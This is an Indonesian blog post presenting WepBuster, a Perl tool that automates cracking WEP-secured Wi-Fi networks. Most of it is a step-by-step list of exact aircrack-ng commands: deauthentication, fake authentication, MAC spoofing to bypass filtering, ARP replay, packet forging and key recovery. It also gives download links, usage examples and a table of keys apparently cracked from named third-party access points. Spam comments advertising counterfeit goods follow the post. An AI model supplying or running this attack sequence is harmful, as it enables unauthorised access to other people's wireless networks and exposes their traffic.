.
# Pendahuluan
Mungkin kita tidak asing lagi dengan WEP pada keamanan jaringan wireless.
WEP (Wired Equivalent Privacy) merupakan sebuah standar keamanan jaringan
nirkabel. Standar ini memiliki kelemahan-kelemahan dan kemudian digantikan
dengan Wi-Fi Protected Access (WPA). Walau memiliki kelemahan-kelemahan,
WEP masih tetap digunakan secara luas dikarenakan sangat simple dan tidak
membebani Access Point ketika melakukan proses deenkripsi. WEP-Buster
merupakan salah satu teknik untuk melakukan proses cracking terhadap keamanan
jaringan wireless yang terproteksi dengan standart WEP. WEP-Buster akan
melakukan cracking WEP terhadap semua channel yang terditeksi
oleh Wireless Card.
# Kebutuhan
[.] aircrack-ng 1.0 rc4 and above
[.] perl installation with standard libraries (threading support)
perl module :
- Term::ReadKey
- Expect.pm
[.] - macchanger (www.alobbs.com/macchanger)
[.] unix programs : ifconfig, iwconfig, rm, pkill, stty, cp, touch,
mv, route, ping, dhclient, netstat
[.] Wifi Interface, dalam uji coba ini penulis mempergunakan WiFi :
Edimax EW-7318USg, AirLive-WL1600USB, AirLive-WN360USB.
# Pseudocode WepBuster
[1] Wepbuster akan menjalankan "airmon-ng" dan merubah WiFi interface
yang kita gunakan ke fungsi "monitor mode"
[2] Proses "parsing" dilakukan terhadap MAC Address oleh ifconfig output
[3] Wepbuster akan menangkap parameter dan argument yang dikirimkan berupa
channel yang akan dilakukan proses "cracking"
[4] Wepbuster akan melakukan verifikasi terhadap AP yang akan dicracking
[5] Wepbuster akan melakukan pengecekan terhadap channel AP untuk memastikan
waktu yang dibutuhkan untuk melakukan cracking serta secara keseluruhan
melakukan perincian seluruh AP yang mempergunakan keamanan WEP, Jika
keamanan yang dipergunakan bukan WEP maka akan dilewati dari proses ini.
Intinya WepBuster menjalankan : " airodump-ng monitor_interface -t wep -c channel -n -w $filename 2>&1 "
[6] Jika AP mempergunakan WEP, maka akan dilakukan proses cracking, dengan
metode sbb :
[6.a] Mode Cracking : mode pemecahan WEP yang dilakukan terhadap "Bad AP"
ataupu "Known AP"
[6.b] Reveled SSID : mode pemecahan SSID yang di Hidden | Suppressed
dengan cara mengirimkan deauth broadcast, dengan menjalankan
" aireplay-ng -0 1 -a bssid inject_interface -h mac_address 2>&1 "
Jika banyak client yang sudah berasosiasi dengan AP target maka,
akan dijalankan :
" `aireplay-ng -0 1 -a bssid inject_interface -h mac_address -c client_macaddress 2>&1 "
Sayangnya, tidak semua SSID bisa berhasil dimunculkan.
[7] WepBuster akan mengecek apakah AP mempergunakan "MAC Address Filtering"
dan juga mempergunakan "Shared Key Auth"
. Jika ada "MAC Address Filtering" ataupun juga "Shared Key Auth",
maka WepBuster akan melakukan FakeAuth dengan menjalankan perintah :
" aireplay-ng -1 1 -a bssid inject_interface -e 'ssid' -h mac_address -D 2>&1 "
. Jika terdapat "MAC Address Filtering" maka WepBuster akan melakukan
"Spoofing MAC" terhadap client yang dapat berasosiasi dengan AP.
. Jika spoofing MAC Address berhasil maka aplikasi MAC Changer akan
menggantikan MAC Address kita dengan MAC Address yang sudah didapatkan.
[8] WebBuster tetap akan menjalankan FakeAuth dengan selalu melakukan
re-asosiasi setiap 15 menit sekali, dengan menjalankan perintah :
" aireplay-ng -1 900 -o 1 -q 10 -a bssid inject_interface -e 'ssid' -h mac_address "
[9] WepBuster tetap menjalankan airodump sebagai background proses untuk
mengumpulkan data dari AP yang menjadi target, dengan menjalankan :
"airodump-ng monitor_interface -t wep -u 20 -d bssid -c channel --output-format pcap,csv -w inject_dump 2>&1 "
[10] WepBuster tetap menjalankan arp attack sebagai background proses,
dengan menjalankan :
" aireplay-ng inject_interface -3 -b bssid -h mac_address 2>&1 "
[11] WepBuster tetap akan mengumpulkan IV dengan selalu mengirimkan
deaunth broadcast selama IV yang ditargetkan belum tercapai.
dengan menjalankan perintah :
" aireplay-ng -0 1 -a bssid inject_interface -h mac_address "
serta menjalankan :
" aireplay-ng -5 inject_interface -b bssid -r inject_dump-01.cap.tmp -h mac_address "
[12] Jika Proces attack berhasil maka Wepbuster akan membuatkan sebuah arp
packet dengan memanfaatkan keystream yang ada, dengan
menjalankan perintah :
" packetforge-ng -0 -a bssid -h mac_address -k 255.255.255.255 -l 255.255.255.255 -y keystream_xor -w forged_arp.cap "
[13] Wep Buster pun kemudian menjalankan perintah :
" aireplay-ng inject_interface -3 -r forged_arp.cap -b bssid -h mac_address 2>&1 "
[14] Jika terdapat fragmentasi data maka WepBuster akan malakukan rebroadcast
attack (-p 0841), dengan menjalankan perintah :
" aireplay-ng inject_interface -2 -p 0841 -b bssid -c FF:FF:FF:FF:FF:FF -h mac_address 2>&1 "
[15] WepBuster akan melakukan Pemecahan Key, dengan prosesi :
. Jika minimal IV yang dikumpulkan sudah mencapai 17000 maka akan
dimulai pemecahan key, dengan menjalankan perintah :
" aircrack-ng -q -b 'bssid' inject_dump-01.cap "
. Hasil cracking akan masuk kedalam sebiah file : owned.txt
. Jika key tidak dapat dipecahkan selama 15 menit maka AP yang menjadi
target akan ditinggalkan
[16] selesai sudah bagian umum dan terpenting dari perjalanan WepBuster.
# Script download
http://code.google.com/p/wepbuster
http://lirva32.org/download/wepbuster-1.0_beta.rar
# Menjalankan Script
- perl wepbuster [channel/s]
- perl wepbuster (sort | connect) [HOST | IP]
contoh penggunaan :
# perl wepbuster
--- akan melakukan cracking wep semua channel yang terditeksi oleh wifi Anda.
# perl wepbuster 11/s
--- akan melakukan cracking wep semua Ap yang mempergunakan chanell 11.
# Hasil Cracking
+------------------------------------------------------------------------------+
| BSSID CHANNEL SSID KEY TIMESTAMP |
+------------------------------------------------------------------------------+
| 00:21:29:7D:5E:EB === 11 === CafeMandiri === 08:6D:38:15:30 === 1243883642 |
| 00:12:29:1D:E1:B3 === 10 === linksys === 68:28:1a:3c:20 === 1243883642 |
+-------------------------------------------------------------------------------+
Source: echo.or.id
WEP Cracking Automator
Langganan:
Posting Komentar
(
Atom
)
3 komentar :
Mantap gan, kalau menggunkan wireshark gimana?
I was suggested this web site by my cousin. I'm not sure
whether this post is written by him as no one else know such
detailed about my difficulty. You're wonderful! Thanks!
Also visit my blog www.vstory.co.kr
15.07.16daigege
ray ban glasses
hollister clothing
oakley sunglasses outlet
nike tn pas cher
kate spade uk
true religion jeans
cheap oakleys
michael kors handbag
ed hardy clothing
nike tn
toms shoes outlet
snapback hats wholesale
ralph lauren uk
tory burch shoes
soccer jerseys
burberry outlet online
coach outlet online
replica watches
michael kors uk
pandora jewelry
toms outlet
gucci outlet
oakley sunglasses discount
kate spade bags
coach outlet
ray bans
ralph lauren
jordan pas cher
chaussure louboutin
air max 90
christian louboutin outlet
coach outlet online
michael kors bag
oakley sunglasses wholesale
fitflops outlet
mcm outlet
oakley sunglasses outlet
coach factory outlet
burberry outlet
chanel online shop
Posting Komentar
Silahkan tinggalkan komentar anda disini...